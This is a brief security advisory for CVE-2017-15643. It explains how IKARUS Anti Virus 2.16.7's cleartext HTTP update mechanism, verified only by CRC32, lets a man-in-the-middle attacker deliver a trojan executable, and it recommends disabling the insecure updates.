CVE-2017-15643

Name of the Vulnerable Software and Affected Versions IKARUS Anti Virus version 2.16.7

Description The issue allows an active network attacker, in a man-in-the-middle (MiTM) position, to achieve remote code execution on a machine running the affected software. This is possible because the software uses cleartext HTTP for updates, relying on a CRC32 checksum and an update value for verification of downloaded files. The attacker can force the client to initiate an update transaction by modifying an HTTP response, leading to the download of a Trojan horse executable file, such as guardxup.exe, which has a correct CRC32 checksum.

Recommendations For IKARUS Anti Virus version 2.16.7, consider disabling the update feature via cleartext HTTP until a secure update mechanism is implemented or a patch is available. Restrict access to the update module to minimize the risk of exploitation. Avoid using the affected update mechanism until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.